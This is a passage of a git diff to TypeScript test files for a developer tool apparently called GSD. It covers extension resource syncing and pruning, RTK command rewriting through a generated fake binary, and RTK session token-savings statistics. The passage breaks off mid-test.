+
+  writeFileSync(join(bundledDir, "ask-user-questions.ts"), "export {};\n");
+  assert.equal(hasStaleCompiledExtensionSiblings(extensionsDir, bundledDir), false);
 });
 
-test("buildResourceLoader excludes duplicate top-level pi extensions when bundled resources use .js", async () => {
+test("buildResourceLoader excludes duplicate top-level pi extensions when bundled resources use .js", async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), "gsd-resource-loader-home-"));
   const piExtensionsDir = join(tmp, ".pi", "agent", "extensions");
   const fakeAgentDir = join(tmp, ".gsd", "agent");
   const restoreHomeEnv = overrideHomeEnv(tmp);
 
+  t.after(() => {
+    restoreHomeEnv();
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  mkdirSync(piExtensionsDir, { recursive: true });
+  writeFileSync(join(piExtensionsDir, "ask-user-questions.ts"), "export {};\n");
+  writeFileSync(join(piExtensionsDir, "custom-extension.ts"), "export {};\n");
+
+  const { buildResourceLoader } = await import("../resource-loader.ts");
+  const loader = buildResourceLoader(fakeAgentDir) as { additionalExtensionPaths?: string[] };
+  const additionalExtensionPaths = loader.additionalExtensionPaths ?? [];
+
+  assert.equal(
+    additionalExtensionPaths.some((entryPath) => entryPath.endsWith("ask-user-questions.ts")),
+    false,
+    "bundled compiled extensions should suppress duplicate pi top-level .ts siblings",
+  );
+  assert.equal(
+    additionalExtensionPaths.some((entryPath) => entryPath.endsWith("custom-extension.ts")),
+    true,
+    "non-duplicate pi extensions should still load",
+  );
+});
+
+test("initResources manifest tracks all bundled extension subdirectories including remote-questions (#2367)", async () => {
+  const { initResources } = await import("../resource-loader.ts");
+  const tmp = mkdtempSync(join(tmpdir(), "gsd-resource-loader-manifest-"));
+  const fakeAgentDir = join(tmp, "agent");
+
   try {
-    mkdirSync(piExtensionsDir, { recursive: true });
-    writeFileSync(join(piExtensionsDir, "ask-user-questions.ts"), "export {};\n");
-    writeFileSync(join(piExtensionsDir, "custom-extension.ts"), "export {};\n");
+    initResources(fakeAgentDir);
 
-    const { buildResourceLoader } = await import("../resource-loader.ts");
-    const loader = buildResourceLoader(fakeAgentDir) as { additionalExtensionPaths?: string[] };
-    const additionalExtensionPaths = loader.additionalExtensionPaths ?? [];
+    const manifestPath = join(fakeAgentDir, "managed-resources.json");
+    assert.equal(existsSync(manifestPath), true, "managed-resources.json should exist after initResources");
 
-    assert.equal(
-      additionalExtensionPaths.some((entryPath) => entryPath.endsWith("ask-user-questions.ts")),
-      false,
-      "bundled compiled extensions should suppress duplicate pi top-level .ts siblings",
+    const manifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
+    const installedDirs: string[] = manifest.installedExtensionDirs ?? [];
+
+    // remote-questions uses mod.ts (not index.ts) as its entry point and has an
+    // extension-manifest.json — it must still appear in the manifest so that
+    // pruneRemovedBundledExtensions can track it across upgrades.
+    assert.ok(
+      installedDirs.includes("remote-questions"),
+      `installedExtensionDirs should include remote-questions but got: [${installedDirs.join(", ")}]`,
     );
+
+    // Also verify that the synced remote-questions directory actually exists in the agent dir
     assert.equal(
-      additionalExtensionPaths.some((entryPath) => entryPath.endsWith("custom-extension.ts")),
+      existsSync(join(fakeAgentDir, "extensions", "remote-questions")),
       true,
-      "non-duplicate pi extensions should still load",
+      "remote-questions directory should be synced to agent extensions",
     );
   } finally {
-    restoreHomeEnv();
     rmSync(tmp, { recursive: true, force: true });
   }
 });
 
-test("initResources prunes stale top-level extension siblings next to bundled compiled extensions", async () => {
+test("initResources prunes stale top-level extension siblings next to bundled compiled extensions", async (t) => {
   const { initResources } = await import("../resource-loader.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-resource-loader-sync-"));
   const fakeAgentDir = join(tmp, "agent");
   const bundledTsPath = join(fakeAgentDir, "extensions", "ask-user-questions.ts");
   const bundledJsPath = join(fakeAgentDir, "extensions", "ask-user-questions.js");
 
-  try {
-    initResources(fakeAgentDir);
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }); });
 
-    const bundledPath = existsSync(bundledJsPath)
-      ? bundledJsPath
-      : bundledTsPath;
-    const staleSiblingPath = bundledPath.endsWith(".js")
-      ? bundledTsPath
-      : bundledJsPath;
+  initResources(fakeAgentDir);
 
-    assert.equal(existsSync(bundledPath), true, "bundled top-level extension should exist");
+  const bundledPath = existsSync(bundledJsPath)
+    ? bundledJsPath
+    : bundledTsPath;
+  const staleSiblingPath = bundledPath.endsWith(".js")
+    ? bundledTsPath
+    : bundledJsPath;
+  const siblingWasBundled = existsSync(staleSiblingPath);
+  const staleContent = "export {};\n";
 
-    // Simulate a stale opposite-format sibling left from a previous sync/build mismatch.
-    writeFileSync(staleSiblingPath, "export {};\n");
-    assert.equal(existsSync(staleSiblingPath), true);
+  assert.equal(existsSync(bundledPath), true, "bundled top-level extension should exist");
 
-    initResources(fakeAgentDir);
+  // Simulate a stale opposite-format sibling left from a previous sync/build mismatch.
+  writeFileSync(staleSiblingPath, staleContent);
+  assert.equal(existsSync(staleSiblingPath), true);
 
+  // Force a full resync so this test exercises the prune/copy path rather than
+  // the early-return manifest fast path.
+  const manifestPath = join(fakeAgentDir, "managed-resources.json");
+  const manifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
+  manifest.contentHash = "force-resync";
+  writeFileSync(manifestPath, JSON.stringify(manifest));
+
+  initResources(fakeAgentDir);
+
+  if (siblingWasBundled) {
+    assert.equal(existsSync(staleSiblingPath), true, "bundled sibling should be restored during sync");
+    assert.notEqual(readFileSync(staleSiblingPath, "utf-8"), staleContent, "bundled sibling should overwrite stale contents");
+  } else {
     assert.equal(existsSync(staleSiblingPath), false, "stale top-level sibling should be removed during sync");
-    assert.equal(existsSync(bundledPath), true, "bundled extension should remain after cleanup");
+  }
+  assert.equal(existsSync(bundledPath), true, "bundled extension should remain after cleanup");
+});
+
+test("pruneRemovedBundledExtensions removes stale subdirectory extensions not in current bundle", async () => {
+  const { initResources } = await import("../resource-loader.ts");
+  const tmp = mkdtempSync(join(tmpdir(), "gsd-resource-loader-prune-dirs-"));
+  const fakeAgentDir = join(tmp, "agent");
+
+  try {
+    // First sync — seeds the agent dir and writes the manifest.
+    initResources(fakeAgentDir);
+
+    // Simulate a stale subdirectory extension left from a previous GSD version.
+    // This mirrors the mcporter scenario: it was bundled before, synced to
+    // ~/.gsd/agent/extensions/, then removed from the bundle in a newer version.
+    const staleExtDir = join(fakeAgentDir, "extensions", "mcporter");
+    mkdirSync(staleExtDir, { recursive: true });
+    writeFileSync(join(staleExtDir, "index.ts"), 'export default { name: "mcporter" };\n');
+    assert.equal(existsSync(staleExtDir), true, "stale subdir extension should exist before prune");
+
+    // Read the manifest to verify subdirectory extensions are tracked.
+    const manifestPath = join(fakeAgentDir, "managed-resources.json");
+    const manifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
+
+    // The manifest must record installed extension directories so the pruner
+    // can detect when one has been removed from the bundle.
+    assert.ok(
+      Array.isArray(manifest.installedExtensionDirs),
+      "manifest should contain installedExtensionDirs array",
+    );
+
+    // Bump the manifest version to force a re-sync (simulates upgrading GSD).
+    manifest.gsdVersion = "0.0.0-force-resync";
+    manifest.contentHash = "0000000000000000";
+    writeFileSync(manifestPath, JSON.stringify(manifest));
+
+    // Second sync — the bundle no longer contains mcporter/, so it must be pruned.
+    initResources(fakeAgentDir);
+
+    assert.equal(
+      existsSync(staleExtDir),
+      false,
+      "stale subdirectory extension (mcporter/) should be pruned after upgrade",
+    );
   } finally {
     rmSync(tmp, { recursive: true, force: true });
   }
diff --git a/src/tests/resource-sync-staleness.test.ts b/src/tests/resource-sync-staleness.test.ts
index 9f5b8e67d..56681018d 100644
--- a/src/tests/resource-sync-staleness.test.ts
+++ b/src/tests/resource-sync-staleness.test.ts
@@ -12,7 +12,7 @@ import { tmpdir } from "node:os";
  * with a broken import to persist at ~/.gsd/agent/extensions/).
  */
 
-test("resource manifest includes contentHash", async () => {
+test("resource manifest includes contentHash", async (t) => {
   // We can't easily call initResources directly because it depends on
   // module-level resolved paths. Instead, verify the manifest schema
   // by simulating what writeManagedResourceManifest produces.
@@ -25,15 +25,13 @@ test("resource manifest includes contentHash", async () => {
   const tmpDir = mkdtempSync(join(tmpdir(), "gsd-resource-test-"));
   const manifestPath = join(tmpDir, "managed-resources.json");
 
-  try {
-    writeFileSync(manifestPath, JSON.stringify(manifest));
-    const read = JSON.parse(readFileSync(manifestPath, "utf-8"));
-    assert.equal(read.gsdVersion, "2.28.0");
-    assert.equal(read.contentHash, "abc123def456");
-    assert.equal(typeof read.syncedAt, "number");
-  } finally {
-    rmSync(tmpDir, { recursive: true, force: true });
-  }
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
+
+  writeFileSync(manifestPath, JSON.stringify(manifest));
+  const read = JSON.parse(readFileSync(manifestPath, "utf-8"));
+  assert.equal(read.gsdVersion, "2.28.0");
+  assert.equal(read.contentHash, "abc123def456");
+  assert.equal(typeof read.syncedAt, "number");
 });
 
 test("missing contentHash in manifest triggers re-sync (upgrade path)", () => {
diff --git a/src/tests/rtk-execution-seams.test.ts b/src/tests/rtk-execution-seams.test.ts
new file mode 100644
index 000000000..0d1a781ec
--- /dev/null
+++ b/src/tests/rtk-execution-seams.test.ts
@@ -0,0 +1,213 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { chmodSync, copyFileSync, mkdirSync, mkdtempSync, rmSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+import { rewriteCommandWithRtk as rewriteSharedCommandWithRtk } from "../resources/extensions/shared/rtk.ts";
+import { runVerificationGate } from "../resources/extensions/gsd/verification-gate.ts";
+import { AsyncJobManager } from "../resources/extensions/async-jobs/job-manager.ts";
+import { createAsyncBashTool } from "../resources/extensions/async-jobs/async-bash-tool.ts";
+import { cleanupAll, startProcess } from "../resources/extensions/bg-shell/process-manager.ts";
+import { runOnSession } from "../resources/extensions/bg-shell/interaction.ts";
+import { createFakeRtk } from "./rtk-test-utils.ts";
+
+const noopSignal = new AbortController().signal;
+
+async function waitFor(predicate: () => boolean, timeoutMs = 2_000, pollMs = 25): Promise<void> {
+  const deadline = Date.now() + timeoutMs;
+  while (Date.now() < deadline) {
+    if (predicate()) return;
+    await new Promise((resolve) => setTimeout(resolve, pollMs));
+  }
+  throw new Error(`condition not met within ${timeoutMs}ms`);
+}
+
+async function waitForOutputMatch(
+  getOutput: () => string,
+  pattern: RegExp,
+  timeoutMs = 2_000,
+): Promise<string> {
+  let latest = getOutput();
+  await waitFor(() => {
+    latest = getOutput();
+    return pattern.test(latest);
+  }, timeoutMs);
+  return latest;
+}
+
+function withFakeRtk<T>(mapping: Record<string, string | { status?: number; stdout?: string }>, run: () => Promise<T> | T): Promise<T> | T {
+  const fake = createFakeRtk(mapping);
+  const previousPath = process.env.GSD_RTK_PATH;
+  const previousDisabled = process.env.GSD_RTK_DISABLED;
+  const previousTimeout = process.env.GSD_RTK_REWRITE_TIMEOUT_MS;
+  process.env.GSD_RTK_PATH = fake.path;
+  process.env.GSD_RTK_REWRITE_TIMEOUT_MS = "20000";
+  delete process.env.GSD_RTK_DISABLED;
+
+  const finalize = () => {
+    if (previousPath === undefined) delete process.env.GSD_RTK_PATH;
+    else process.env.GSD_RTK_PATH = previousPath;
+    if (previousDisabled === undefined) delete process.env.GSD_RTK_DISABLED;
+    else process.env.GSD_RTK_DISABLED = previousDisabled;
+    if (previousTimeout === undefined) delete process.env.GSD_RTK_REWRITE_TIMEOUT_MS;
+    else process.env.GSD_RTK_REWRITE_TIMEOUT_MS = previousTimeout;
+    fake.cleanup();
+  };
+
+  try {
+    const result = run();
+    if (result && typeof (result as Promise<T>).then === "function") {
+      return (result as Promise<T>).finally(finalize);
+    }
+    finalize();
+    return result;
+  } catch (error) {
+    finalize();
+    throw error;
+  }
+}
+
+function withManagedFakeRtk<T>(mapping: Record<string, string | { status?: number; stdout?: string }>, run: (env: NodeJS.ProcessEnv, managedPath: string) => Promise<T> | T): Promise<T> | T {
+  const fake = createFakeRtk(mapping);
+  const managedHome = mkdtempSync(join(tmpdir(), "gsd-rtk-managed-home-"));
+  const managedDir = join(managedHome, "agent", "bin");
+  const managedPath = join(managedDir, process.platform === "win32" ? "rtk.cmd" : "rtk");
+  mkdirSync(managedDir, { recursive: true });
+  copyFileSync(fake.path, managedPath);
+  if (process.platform !== "win32") {
+    chmodSync(managedPath, 0o755);
+  }
+
+  const previousHome = process.env.GSD_HOME;
+  const previousPath = process.env.GSD_RTK_PATH;
+  const previousDisabled = process.env.GSD_RTK_DISABLED;
+  const previousTimeout = process.env.GSD_RTK_REWRITE_TIMEOUT_MS;
+  process.env.GSD_HOME = managedHome;
+  process.env.GSD_RTK_REWRITE_TIMEOUT_MS = "20000";
+  delete process.env.GSD_RTK_PATH;
+  delete process.env.GSD_RTK_DISABLED;
+
+  const env: NodeJS.ProcessEnv = {
+    ...process.env,
+    GSD_HOME: managedHome,
+    GSD_RTK_REWRITE_TIMEOUT_MS: "20000",
+  };
+  delete env.GSD_RTK_PATH;
+
+  const finalize = () => {
+    if (previousHome === undefined) delete process.env.GSD_HOME;
+    else process.env.GSD_HOME = previousHome;
+    if (previousPath === undefined) delete process.env.GSD_RTK_PATH;
+    else process.env.GSD_RTK_PATH = previousPath;
+    if (previousDisabled === undefined) delete process.env.GSD_RTK_DISABLED;
+    else process.env.GSD_RTK_DISABLED = previousDisabled;
+    if (previousTimeout === undefined) delete process.env.GSD_RTK_REWRITE_TIMEOUT_MS;
+    else process.env.GSD_RTK_REWRITE_TIMEOUT_MS = previousTimeout;
+    fake.cleanup();
+    rmSync(managedHome, { recursive: true, force: true });
+  };
+
+  try {
+    const result = run(env, managedPath);
+    if (result && typeof (result as Promise<T>).then === "function") {
+      return (result as Promise<T>).finally(finalize);
+    }
+    finalize();
+    return result;
+  } catch (error) {
+    finalize();
+    throw error;
+  }
+}
+
+// NOTE: The bash tool itself no longer does RTK rewriting directly. That's now
+// handled by the bash_transform extension hook in register-hooks.ts. The seam
+// tests below verify the GSD-layer surfaces that still call rewriteCommandWithRtk
+// directly: shared/rtk.ts, verification-gate, async-bash, and bg-shell.
+
+test("shared RTK helper rewrites commands via fake RTK binary", async () => {
+  await withFakeRtk({ "echo raw": "echo rewritten" }, async () => {
+    const rewritten = rewriteSharedCommandWithRtk("echo raw");
+    assert.equal(rewritten, "echo rewritten");
+  });
+});
+
+test("shared RTK helper falls back to the managed RTK path when GSD_RTK_PATH is unset", async () => {
+  await withManagedFakeRtk({ "echo raw": "echo rewritten" }, async (env) => {
+    assert.equal(rewriteSharedCommandWithRtk("echo raw", env), "echo rewritten");
+  });
+});
+
+test("verification gate executes the RTK-rewritten command", async () => {
+  await withFakeRtk({ "echo raw": "echo rewritten" }, async () => {
+    const result = runVerificationGate({
+      basePath: process.cwd(),
+      unitId: "T-RTK",
+      cwd: process.cwd(),
+      preferenceCommands: ["echo raw"],
+    });
+
+    assert.equal(result.passed, true);
+    assert.equal(result.checks.length, 1);
+    assert.match(result.checks[0]?.stdout ?? "", /rewritten/);
+  });
+});
+
+test("async_bash executes the RTK-rewritten command", async () => {
+  await withFakeRtk({ "echo raw": "echo rewritten" }, async () => {
+    const manager = new AsyncJobManager();
+    const tool = createAsyncBashTool(() => manager, () => process.cwd());
+
+    const result = await tool.execute(
+      "rtk-async",
+      { command: "echo raw", label: "rtk-async" },
+      noopSignal,
+      () => {},
+      undefined as never,
+    );
+
+    const text = result.content.map((entry) => entry.text ?? "").join("\n");
+    const jobId = text.match(/\*\*(bg_[a-f0-9]+)\*\*/)?.[1];
+    assert.ok(jobId, "expected async_bash to return a job id");
+
+    const job = manager.getJob(jobId!);
+    assert.ok(job, "job should be registered");
+    await job!.promise;
+    assert.match(job!.resultText ?? "", /rewritten/);
+    manager.shutdown();
+  });
+});
+
+test("bg_shell start and runOnSession both execute RTK-rewritten commands", async (t) => {
+  if (process.platform === "win32") {
+    t.skip("bg_shell requires bash; Windows CI runners don't have Git Bash");
+    return;
+  }
+  t.after(cleanupAll);
+
+  await withFakeRtk({ "echo raw": "echo rewritten" }, async () => {
+    const oneshot = startProcess({
+      command: "echo raw",
+      cwd: process.cwd(),
+      ownerSessionFile: "session-rtk",
+    });
+
+    assert.match(
+      await waitForOutputMatch(() => oneshot.output.map((line) => line.line).join("\n"), /rewritten/),
+      /rewritten/,
+    );
+
+    const shellSession = startProcess({
+      command: "",
+      cwd: process.cwd(),
+      ownerSessionFile: "session-rtk-shell",
+      type: "shell",
+    });
+
+    await waitFor(() => shellSession.status === "ready" || !shellSession.alive);
+    const result = await runOnSession(shellSession, "echo raw", 2_000);
+    assert.equal(result.exitCode, 0);
+    assert.match(result.output, /rewritten/);
+  });
+});
diff --git a/src/tests/rtk-session-stats.test.ts b/src/tests/rtk-session-stats.test.ts
new file mode 100644
index 000000000..5b6f1791d
--- /dev/null
+++ b/src/tests/rtk-session-stats.test.ts
@@ -0,0 +1,207 @@
+import test, { beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { chmodSync, copyFileSync, mkdirSync, mkdtempSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  clearRtkSessionBaseline,
+  ensureRtkSessionBaseline,
+  formatRtkSavingsLabel,
+  getRtkSessionSavings,
+} from "../resources/extensions/shared/rtk-session-stats.ts";
+import { createFakeRtk } from "./rtk-test-utils.ts";
+
+// Store original env values for restoration
+let originalRtkDisabled: string | undefined;
+
+beforeEach(() => {
+  // Save and clear GSD_RTK_DISABLED so tests can use fake RTK binaries
+  originalRtkDisabled = process.env.GSD_RTK_DISABLED;
+  delete process.env.GSD_RTK_DISABLED;
+});
+
+afterEach(() => {
+  // Restore original env
+  if (originalRtkDisabled !== undefined) {
+    process.env.GSD_RTK_DISABLED = originalRtkDisabled;
+  } else {
+    delete process.env.GSD_RTK_DISABLED;
+  }
+});
+
+function summary(totalCommands: number, totalInput: number, totalOutput: number, totalSaved: number, totalTimeMs = 1000) {
+  return JSON.stringify({
+    summary: {
+      total_commands: totalCommands,
+      total_input: totalInput,
+      total_output: totalOutput,
+      total_saved: totalSaved,
+      avg_savings_pct: totalInput > 0 ? (totalSaved / totalInput) * 100 : 0,
+      total_time_ms: totalTimeMs,
+      avg_time_ms: totalCommands > 0 ? totalTimeMs / totalCommands : 0,
+    },
+  });
+}
+
+test("RTK session savings diff from a persisted baseline", () => {
+  const basePath = mkdtempSync(join(tmpdir(), "gsd-rtk-session-stats-"));
+  mkdirSync(join(basePath, ".gsd", "runtime"), { recursive: true });
+
+  const first = createFakeRtk({
+    "gain --all --format json": { stdout: summary(10, 1000, 600, 400) },
+  });
+  const second = createFakeRtk({
+    "gain --all --format json": { stdout: summary(14, 1600, 900, 700, 1800) },
+  });
+
+  const previous = process.env.GSD_RTK_PATH;
+  try {
+    process.env.GSD_RTK_PATH = first.path;
+    ensureRtkSessionBaseline(basePath, "sess-1");
+
+    process.env.GSD_RTK_PATH = second.path;
+    const savings = getRtkSessionSavings(basePath, "sess-1");
+    assert.ok(savings, "expected RTK savings snapshot");
+    assert.equal(savings?.commands, 4);
+    assert.equal(savings?.inputTokens, 600);
+    assert.equal(savings?.outputTokens, 300);
+    assert.equal(savings?.savedTokens, 300);
+    assert.equal(Math.round(savings?.savingsPct ?? 0), 50);
+  } finally {
+    if (previous === undefined) delete process.env.GSD_RTK_PATH;
+    else process.env.GSD_RTK_PATH = previous;
+    first.cleanup();
+    second.cleanup();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("RTK session savings baseline resets cleanly when tracking totals go backwards", () => {
+  const basePath = mkdtempSync(join(tmpdir(), "gsd-rtk-session-reset-"));
+  mkdirSync(join(basePath, ".gsd", "runtime"), { recursive: true });
+
+  const first = createFakeRtk({
+    "gain --all --format json": { stdout: summary(8, 800, 500, 300) },
+  });
+  const second = createFakeRtk({
+    "gain --all --format json": { stdout: summary(1, 100, 80, 20) },
+  });
+
+  const previous = process.env.GSD_RTK_PATH;
+  try {
+    process.env.GSD_RTK_PATH = first.path;
+    ensureRtkSessionBaseline(basePath, "sess-2");
+
+    process.env.GSD_RTK_PATH = second.path;
+    const savings = getRtkSessionSavings(basePath, "sess-2");
+    assert.ok(savings, "expected RTK savings snapshot");
+    assert.equal(savings?.commands, 0);
+    assert.equal(savings?.savedTokens, 0);
+  } finally {
+    if (previous === undefined) delete process.env.GSD_RTK_PATH;
+    else process.env.GSD_RTK_PATH = previous;
+    first.cleanup();
+    second.cleanup();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("RTK session stats fall back to the managed RTK path when GSD_RTK_PATH is unset", () => {
+  const basePath = mkdtempSync(join(tmpdir(), "gsd-rtk-session-managed-"));
+  mkdirSync(join(basePath, ".gsd", "runtime"), { recursive: true });
+
+  const fake = createFakeRtk({
+    "gain --all --format json": { stdout: summary(6, 900, 500, 400) },
+  });
+  const managedHome = mkdtempSync(join(tmpdir(), "gsd-rtk-home-"));
+  const managedDir = join(managedHome, "agent", "bin");
+  const managedPath = join(managedDir, process.platform === "win32" ? "rtk.cmd" : "rtk");
+  mkdirSync(managedDir, { recursive: true });
+  copyFileSync(fake.path, managedPath);
+  if (process.platform !== "win32") {
+    chmodSync(managedPath, 0o755);
+  }
+
+  const previousHome = process.env.GSD_HOME;
+  const previousPath = process.env.GSD_RTK_PATH;
+
+  try {
+    process.env.GSD_HOME = managedHome;
+    delete process.env.GSD_RTK_PATH;
+
+    const env: NodeJS.ProcessEnv = {
+      ...process.env,
+      GSD_HOME: managedHome,
+    };
+    delete env.GSD_RTK_PATH;
+
+    const baseline = ensureRtkSessionBaseline(basePath, "sess-managed", env);
+    assert.ok(baseline, "expected baseline from managed RTK path");
+
+    const savings = getRtkSessionSavings(basePath, "sess-managed", env);
+    assert.ok(savings, "expected savings snapshot from managed RTK path");
+    assert.equal(savings?.commands, 0);
+  } finally {
+    if (previousHome === undefined) delete process.env.GSD_HOME;
+    else process.env.GSD_HOME = previousHome;
+    if (previousPath === undefined) delete process.env.GSD_RTK_PATH;
+    else process.env.GSD_RTK_PATH = previousPath;
+    fake.cleanup();
+    rmSync(managedHome, { recursive: true, force: true });
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("formatRtkSavingsLabel produces a compact footer string", () => {
+  assert.equal(
+    formatRtkSavingsLabel({
+      commands: 5,
+      inputTokens: 5949,
+      outputTokens: 2905,
+      savedTokens: 3044,
+      savingsPct: 51.2,
+      totalTimeMs: 3200,
+      avgTimeMs: 640,
+      updatedAt: new Date().toISOString(),
+    }),
+    "rtk: 3.0k saved (51%)",
+  );
+  assert.equal(
+    formatRtkSavingsLabel({
+      commands: 2,
+      inputTokens: 0,
+      outputTokens: 0,
+      savedTokens: 0,
+      savingsPct: 0,
+      totalTimeMs: 120,
+      avgTimeMs: 60,
+      updatedAt: new Date().toISOString(),
+    }),
+    "rtk: active (2 cmds)",
+  );
+  assert.equal(formatRtkSavingsLabel(null), null);
+});
+
+test("clearRtkSessionBaseline removes a stored session entry", () => {
+  const basePath = mkdtempSync(join(tmpdir(), "gsd-rtk-session-clear-"));
+  mkdirSync(join(basePath, ".gsd", "runtime"), { recursive: true });
+  const fake = createFakeRtk({
+    "gain --all --format json": { stdout: summary(3, 300, 200, 100) },
+  });
+  const previous = process.env.GSD_RTK_PATH;
+
+  try {
+    process.env.GSD_RTK_PATH = fake.path;
+    ensureRtkSessionBaseline(basePath, "sess-clear");
+    clearRtkSessionBaseline(basePath, "sess-clear");
+    const savings = getRtkSessionSavings(basePath, "sess-clear");
+    assert.ok(savings, "expected savings snapshot after baseline recreation");
+    assert.equal(savings?.commands, 0);
+  } finally {
+    if (previous === undefined) delete process.env.GSD_RTK_PATH;
+    else process.env.GSD_RTK_PATH = previous;
+    fake.cleanup();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
diff --git a/src/tests/rtk-test-utils.ts b/src/tests/rtk-test-utils.ts
new file mode 100644
index 000000000..bf3526081
--- /dev/null
+++ b/src/tests/rtk-test-utils.ts
@@ -0,0 +1,75 @@
+import { chmodSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+export type FakeRtkResponse = string | { status?: number; stdout?: string };
+
+function shellQuote(value: string): string {
+  return `'${value.replace(/'/g, `'\"'\"'`)}'`;
+}
+
+export function createFakeRtk(mapping: Record<string, FakeRtkResponse>): { path: string; cleanup: () => void } {
+  const dir = mkdtempSync(join(tmpdir(), "gsd-fake-rtk-"));
+  const payload = JSON.stringify(mapping);
+
+  const jsSource = `#!/usr/bin/env node
+const mapping = ${payload};
+const args = process.argv.slice(2);
+const fullInput = args.join(' ');
+const rewriteInput = args[0] === 'rewrite' ? args.slice(1).join(' ') : null;
+const match = mapping[fullInput] ?? (rewriteInput !== null ? mapping[rewriteInput] : undefined);
+if (match === undefined) process.exit(1);
+if (typeof match === 'string') {
+  process.stdout.write(match);
+  process.exit(0);
+}
+if (match.stdout) process.stdout.write(match.stdout);
+process.exit(match.status ?? 0);
+`;
+
+  if (process.platform === "win32") {
+    const jsPath = join(dir, "fake-rtk.js");
+    const cmdPath = join(dir, "rtk.cmd");
+    writeFileSync(jsPath, jsSource, "utf-8");
+    // Use the absolute jsPath so the .cmd works even when copied to another directory.
+    writeFileSync(cmdPath, `@echo off\r\n"${process.execPath}" "${jsPath}" %*\r\n`, "utf-8");
+    return {
+      path: cmdPath,
+      cleanup: () => rmSync(dir, { recursive: true, force: true }),
+    };
+  }
+
+  const binaryPath = join(dir, "rtk");
+  const cases = Object.entries(mapping).map(([key, response], index) => {
+    const output = typeof response === "string" ? response : (response.stdout ?? "");
+    const status = typeof response === "string" ? 0 : (response.status ?? 0);
+    return `
+if [ "$full_input" = ${shellQuote(key)} ]; then
+  printf '%s' ${shellQuote(output)}
+  exit ${status}
+fi
+if [ -n "$rewrite_input" ] && [ "$rewrite_input" = ${shellQuote(key)} ]; then
+  printf '%s' ${shellQuote(output)}
+  exit ${status}
+fi`.trimStart();
+  }).join("\n\n");
+
+  const shellSource = `#!/bin/sh
+full_input="$*"
+rewrite_input=""
+if [ "$1" = "rewrite" ]; then
+  shift
+  rewrite_input="$*"
+fi
+
+${cases}
+
+exit 1
+`;
+  writeFileSync(binaryPath, shellSource, "utf-8");
+  chmodSync(binaryPath, 0o755);
+  return {
+    path: binaryPath,
+    cleanup: () => rmSync(dir, { recursive: true, force: true }),
+  };
+}
diff --git a/src/tests/rtk.test.ts b/src/tests/rtk.test.ts
new file mode 100644
index 000000000..8c9c76071
--- /dev/null
+++ b/src/tests/rtk.test.ts
@@ -0,0 +1,144 @@
+import test, { beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { chmodSync, copyFileSync, mkdirSync, mkdtempSync, rmSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { delimiter, join } from "node:path";
+
+import {
+  buildRtkEnv,
+  ensureRtkAvailable,
+  GSD_RTK_DISABLED_ENV,
+  GSD_RTK_PATH_ENV,
+  GSD_SKIP_RTK_INSTALL_ENV,
+  getManagedRtkDir,
+  prependPathEntry,
+  resolveRtkAssetName,
+  resolveRtkBinaryPath,
+  rewriteCommandWithRtk,
+  validateRtkBinary,
+} from "../rtk.ts";
+import { createFakeRtk } from "./rtk-test-utils.ts";
+
+// Store original env values for restoration
+let originalRtkDisabled: string | undefined;
+
+beforeEach(() => {
+  // Save and clear GSD_RTK_DISABLED so tests can use fake RTK binaries
+  originalRtkDisabled = process.env.GSD_RTK_DISABLED;
+  delete process.env.GSD_RTK_DISABLED;
+});
+
+afterEach(() => {
+  // Restore original env
+  if (originalRtkDisabled !== undefined) {
+    process.env.GSD_RTK_DISABLED = originalRtkDisabled;
+  } else {
+    delete process.env.GSD_RTK_DISABLED;
+  }
+});
+
+test("resolveRtkAssetName maps supported release assets correctly", () => {
+  assert.equal(resolveRtkAssetName("darwin", "arm64"), "rtk-aarch64-apple-darwin.tar.gz");
+  assert.equal(resolveRtkAssetName("darwin", "x64"), "rtk-x86_64-apple-darwin.tar.gz");
+  assert.equal(resolveRtkAssetName("linux", "arm64"), "rtk-aarch64-unknown-linux-gnu.tar.gz");
+  assert.equal(resolveRtkAssetName("linux", "x64"), "rtk-x86_64-unknown-linux-musl.tar.gz");
+  assert.equal(resolveRtkAssetName("win32", "x64"), "rtk-x86_64-pc-windows-msvc.zip");
+  assert.equal(resolveRtkAssetName("win32", "arm64"), null);
+});
+
+test("prependPathEntry preserves the original PATH key casing and avoids duplicates", () => {
+  const env: NodeJS.ProcessEnv = { Path: "/usr/bin" };
+  prependPathEntry(env, "/tmp/gsd-bin");
+  assert.equal(env.Path, `/tmp/gsd-bin${delimiter}${"/usr/bin"}`);
+  prependPathEntry(env, "/tmp/gsd-bin");
+  assert.equal(env.Path, `/tmp/gsd-bin${delimiter}${"/usr/bin"}`);
+});
+
+test("buildRtkEnv prepends the managed bin dir and disables telemetry", () => {
+  const env = buildRtkEnv({ PATH: "/usr/bin" });
+  assert.ok(env.PATH?.startsWith(`${getManagedRtkDir()}${delimiter}`));
+  assert.equal(env.RTK_TELEMETRY_DISABLED, "1");
+});
+
+test("rewriteCommandWithRtk rewrites when RTK returns exit 0 or 3", () => {
+  const spawnSyncImpl = ((_binary: string, _args: string[]) => ({ status: 0, stdout: "rtk git status", error: undefined })) as typeof import("node:child_process").spawnSync;
+  assert.equal(rewriteCommandWithRtk("git status", { binaryPath: "/tmp/rtk", spawnSyncImpl }), "rtk git status");
+
+  const askSpawn = ((_binary: string, _args: string[]) => ({ status: 3, stdout: "rtk npm run test", error: undefined })) as typeof import("node:child_process").spawnSync;
